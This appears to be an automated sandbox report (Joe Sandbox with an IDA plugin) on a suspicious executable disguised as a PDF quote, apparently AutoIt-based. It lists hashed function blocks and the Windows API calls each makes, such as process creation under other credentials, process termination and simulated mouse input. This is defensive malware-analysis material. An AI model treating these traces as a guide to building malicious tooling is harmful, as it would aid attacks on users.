                                                                    • Opcode ID: faa57e56541890d59d93c30eccc22317182f57fe42a09fd02cc4135fc78e3808
                                                                    • Instruction ID: d7ccfc9e355df69be3b10e65c264b4e0215423ab5dd86d011d98f89d7e820ddf
                                                                    • Opcode Fuzzy Hash: faa57e56541890d59d93c30eccc22317182f57fe42a09fd02cc4135fc78e3808
                                                                    • Instruction Fuzzy Hash: 6A41E3305403049FDB11DF25EC84FBA7BE8FB46764F080269F694AB2A2C7709805DB62
                                                                    APIs
                                                                    • ShowWindow.USER32(00F257B0,00000000,017C64C8,?,?,00F257B0,?,00EEB5DC,?,?), ref: 00EEB746
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00EEB76A
                                                                    • ShowWindow.USER32(00F257B0,00000000,017C64C8,?,?,00F257B0,?,00EEB5DC,?,?), ref: 00EEB7CA
                                                                    • ShowWindow.USER32(00000000,00000004,?,00EEB5DC,?,?), ref: 00EEB7DC
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00EEB800
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EEB823
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 031f1bf95d1dccaeafd4c35b556627c26b92a35c89874e63556471cb844899d8
                                                                    • Instruction ID: 0cf7b897b3e4c8d2aca57a8925a2ceeec152f006b436a76c26e92bb8237bd0d2
                                                                    • Opcode Fuzzy Hash: 031f1bf95d1dccaeafd4c35b556627c26b92a35c89874e63556471cb844899d8
                                                                    • Instruction Fuzzy Hash: 7441C734600199EFDB26CF25C4C9B957BE1FF45319F1842BAF948AF6A2C731A845CB90
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00ED4F57,?,?,00000000,00000001), ref: 00ED71C1
                                                                      • Part of subcall function 00ED3AB6: GetWindowRect.USER32(?,?), ref: 00ED3AC9
                                                                    • GetDesktopWindow.USER32 ref: 00ED71EB
                                                                    • GetWindowRect.USER32(00000000), ref: 00ED71F2
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00ED7224
                                                                      • Part of subcall function 00EC52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EC5363
                                                                    • GetCursorPos.USER32(?), ref: 00ED7250
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00ED72AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: 4d4436f8c6dbdcf0941e0d41e4eed8f78fc9773ec3607f6533f4003c8cbdafac
                                                                    • Instruction ID: 79745ec499c3ca44461e93027efa90dae88e59fab4a803294381515b8d83d691
                                                                    • Opcode Fuzzy Hash: 4d4436f8c6dbdcf0941e0d41e4eed8f78fc9773ec3607f6533f4003c8cbdafac
                                                                    • Instruction Fuzzy Hash: 0F310672109349AFC710DF54C849F9BB7E9FF98304F00191AF484A7191DB30EA49CB92
                                                                    APIs
                                                                      • Part of subcall function 00EB83D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EB83E8
                                                                      • Part of subcall function 00EB83D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EB83F2
                                                                      • Part of subcall function 00EB83D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EB8401
                                                                      • Part of subcall function 00EB83D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EB8408
                                                                      • Part of subcall function 00EB83D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EB841E
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00EB8757), ref: 00EB8B8C
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EB8B98
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00EB8B9F
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00EB8BB8
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00EB8757), ref: 00EB8BCC
                                                                    • HeapFree.KERNEL32(00000000), ref: 00EB8BD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 98486ed456a4243f54968448f17952093a64ab17b5ffab6bdd81a9b62d76bfe2
                                                                    • Instruction ID: 7a613400d83e4a18241f4323049c98539da33c54e6ea9a9295143ea26d1d9c15
                                                                    • Opcode Fuzzy Hash: 98486ed456a4243f54968448f17952093a64ab17b5ffab6bdd81a9b62d76bfe2
                                                                    • Instruction Fuzzy Hash: 67119AB5901208FFDB549FA5CD89BEF7BACEB45319F108028F845BB250CB329A04CB60
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EB890A
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00EB8911
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EB8920
                                                                    • CloseHandle.KERNEL32(00000004), ref: 00EB892B
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EB895A
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EB896E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: db56d94b5b9c5911d9c62850300bd8024fcc874529cc8276e241fa47f187bef6
                                                                    • Instruction ID: e342a1baece14b98206d3e80d8b1675eaff2226d8c7bb7fa70b77e707838b392
                                                                    • Opcode Fuzzy Hash: db56d94b5b9c5911d9c62850300bd8024fcc874529cc8276e241fa47f187bef6
                                                                    • Instruction Fuzzy Hash: 19114A7250124DAFDF01CFA5ED49BEA7BADEF48308F044065FA04B6160C7718E64DB61
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00EBBA77
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EBBA88
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EBBA8F
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00EBBA97
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EBBAAE
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00EBBAC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 86449ed898609974e45dfd9361a9fb07b9d53307dd2a742c6d09f42708857517
                                                                    • Instruction ID: 819f089659cb8120c6e89d5c053a3b51d01c32e76297cc1685bc6a1338e402eb
                                                                    • Opcode Fuzzy Hash: 86449ed898609974e45dfd9361a9fb07b9d53307dd2a742c6d09f42708857517
                                                                    • Instruction Fuzzy Hash: 18017175E00259BBEB109BE69D45A5EBFA8EB48321F0040A5FA08BB291D6709900CF90
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E80313
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E8031B
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E80326
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E80331
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E80339
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E80341
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: 806e88aeddde022caf2715a687d45b77788d5a833cc90d3b5bed6c088b1a2594
                                                                    • Instruction ID: 6e0e9f535f191a21345adf13f27574f04acf39962b54966c6b72463f9b166e4c
                                                                    • Opcode Fuzzy Hash: 806e88aeddde022caf2715a687d45b77788d5a833cc90d3b5bed6c088b1a2594
                                                                    • Instruction Fuzzy Hash: 39016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BE15C4B941C7F5A868CBE5
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EC54A0
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EC54B6
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00EC54C5
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EC54D4
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EC54DE
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EC54E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 107bd6a71925c81e696c2baaab7df661c5d4f6a3079d7126d0a540a1abb1538c
                                                                    • Instruction ID: 8dcde9ca99f677b71f2cfcf3995273b9e23674c88c2165a2ef711a300989e9df
                                                                    • Opcode Fuzzy Hash: 107bd6a71925c81e696c2baaab7df661c5d4f6a3079d7126d0a540a1abb1538c
                                                                    • Instruction Fuzzy Hash: 06F06D3224119DBFE7215BA39C4DEAB7B7CEBCAB11F000169FA01E509196A11A0586B5
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00EC72EC
                                                                    • EnterCriticalSection.KERNEL32(?,?,00E71044,?,?), ref: 00EC72FD
                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E71044,?,?), ref: 00EC730A
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E71044,?,?), ref: 00EC7317
                                                                      • Part of subcall function 00EC6CDE: CloseHandle.KERNEL32(00000000,?,00EC7324,?,00E71044,?,?), ref: 00EC6CE8
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EC732A
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00E71044,?,?), ref: 00EC7331
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: e3d55a57fa781eadd21654989ef5a3fc9034a288805848afa7154f12b1b31885
                                                                    • Instruction ID: 97a8684655beee278c01cc13fc8e72940fe6ab0df317dba2f8074612cda9b18b
                                                                    • Opcode Fuzzy Hash: e3d55a57fa781eadd21654989ef5a3fc9034a288805848afa7154f12b1b31885
                                                                    • Instruction Fuzzy Hash: 56F0BE36840256EFE7111B25EECCEDB772AEF08702B010135FA02B80B0CB729806CBA0
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EB8C5F
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00EB8C6B
                                                                    • CloseHandle.KERNEL32(?), ref: 00EB8C74
                                                                    • CloseHandle.KERNEL32(?), ref: 00EB8C7C
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00EB8C85
                                                                    • HeapFree.KERNEL32(00000000), ref: 00EB8C8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: f033482b6d2d1ced3a96b0309aade147e16cfb12f9e72974636fe6ac85e31eb6
                                                                    • Instruction ID: 9f13655afbbe11645b736f195f904d8200a116f1b1b88cd8365a8eaffb76ffae
                                                                    • Opcode Fuzzy Hash: f033482b6d2d1ced3a96b0309aade147e16cfb12f9e72974636fe6ac85e31eb6
                                                                    • Instruction Fuzzy Hash: 24E0C236004449FFDA011FE2EC4C90ABB69FB89322B108231F219A90B1CB329468DB50
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EF2C7C,?), ref: 00EB7A12
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EF2C7C,?), ref: 00EB7A2A
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00EEFB80,000000FF,?,00000000,00000800,00000000,?,00EF2C7C,?), ref: 00EB7A4F
                                                                    • _memcmp.LIBCMT ref: 00EB7A70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID: ,,
                                                                    • API String ID: 314563124-1556401989
                                                                    • Opcode ID: a3029151e0043fd2c2169fe5805b6741a707c96ae3388a60db6a21716aced420
                                                                    • Instruction ID: 6d67f5c69d8f9f13d9489ae0aa81c4f5cb9eba311320688e1bb0683991c42f30
                                                                    • Opcode Fuzzy Hash: a3029151e0043fd2c2169fe5805b6741a707c96ae3388a60db6a21716aced420
                                                                    • Instruction Fuzzy Hash: 24811771A00109EFCB04DF94C988EEEB7B9FF89315F205198E556BB250DB71AE06CB60
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00ED8728
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00ED8837
                                                                    • VariantClear.OLEAUT32(?), ref: 00ED89AF
                                                                      • Part of subcall function 00EC760B: VariantInit.OLEAUT32(00000000), ref: 00EC764B
                                                                      • Part of subcall function 00EC760B: VariantCopy.OLEAUT32(00000000,?), ref: 00EC7654
                                                                      • Part of subcall function 00EC760B: VariantClear.OLEAUT32(00000000), ref: 00EC7660
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: dd6e3b015fb4a7c3a49ccc7bfeb75e09956efe741b39395a23dfa051a37b50ea
                                                                    • Instruction ID: 09afdabcf4faf33c991f8e408c8bcfba1d7e02d8251ab23c20d90eb97b2aa21f
                                                                    • Opcode Fuzzy Hash: dd6e3b015fb4a7c3a49ccc7bfeb75e09956efe741b39395a23dfa051a37b50ea
                                                                    • Instruction Fuzzy Hash: B8919D75608301DFC700DF24C59096ABBE4EFC8354F14996EF89AAB362DB31E906CB52
                                                                    APIs
                                                                      • Part of subcall function 00E7FE06: _wcscpy.LIBCMT ref: 00E7FE29
                                                                    • _memset.LIBCMT ref: 00EC2E7F
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EC2EAE
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EC2F61
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EC2F8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: df6bf3ce7284467bb8a67b3b9cf1e27a4514e45e8544cfafe7dc68748f1a518d
                                                                    • Instruction ID: e64bc9a4ca278eaafda3b41a67d22586c9a4b43e14297f9ec24d09c078e51248
                                                                    • Opcode Fuzzy Hash: df6bf3ce7284467bb8a67b3b9cf1e27a4514e45e8544cfafe7dc68748f1a518d
                                                                    • Instruction Fuzzy Hash: 3651F1317083459ED725AF28DA40FABB7F4AF45318F046A2DFA94F2190DB72CC068792
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EC2AB8
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EC2AD4
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00EC2B1A
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F25890,00000000), ref: 00EC2B63
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: 2c308eefaf7baeb61e75b81dfbcd4e3600be0f8a1328abb0ff69b55e13cc9784
                                                                    • Instruction ID: 7999da56c0fa63d1bf580f4ae2dd6b708d63888ba3df445a6ff73b21f9dd07d3
                                                                    • Opcode Fuzzy Hash: 2c308eefaf7baeb61e75b81dfbcd4e3600be0f8a1328abb0ff69b55e13cc9784
                                                                    • Instruction Fuzzy Hash: F741C3302043029FD720DF24C985F2ABBE8AF84324F10462DFA65A7291D771ED06CB62
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EDD8D9
                                                                      • Part of subcall function 00E679AB: _memmove.LIBCMT ref: 00E679F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower_memmove
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 3425801089-567219261
                                                                    • Opcode ID: 90832383362791586264b2d252d67d96491c8eaf21b8f5021029f5c53438d3aa
                                                                    • Instruction ID: 3598c7e3512277de940d2f188b9a6130c36c9cca9d8a443e025bc9004fd5dbcc
                                                                    • Opcode Fuzzy Hash: 90832383362791586264b2d252d67d96491c8eaf21b8f5021029f5c53438d3aa
                                                                    • Instruction Fuzzy Hash: 34316271504615ABCF10EF54CCA19EEB3F4FF45354B10965AE869B73D1CB72A906CB80
                                                                    APIs
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00EBAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00EBAEC7
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EB91D6
